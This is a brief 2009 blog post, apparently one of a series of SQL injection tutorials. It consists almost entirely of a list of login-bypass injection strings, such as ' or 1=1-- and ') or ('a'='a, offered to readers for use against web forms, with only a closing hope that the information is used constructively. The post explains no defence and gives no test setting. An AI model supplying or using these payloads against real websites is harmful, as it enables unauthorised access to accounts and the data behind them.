Saturday, May 30, 2009

The previous SQL injection tutorial gave some basic information about SQL injection. In this tutorial some commands are given which you can use in SQL injection.

If you missed the previous tutorial

http://ashishsoft.blogspot.com/2008/01/basic-sql-injection-sql-injection.html

the various commands you can use are

admin'--

' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --

hi' or 'a'='a

hi') or ('a'='a

hi") or ("a"="a


hope you will use this information in constructive manner.
and thanks to ComSec aka ZSL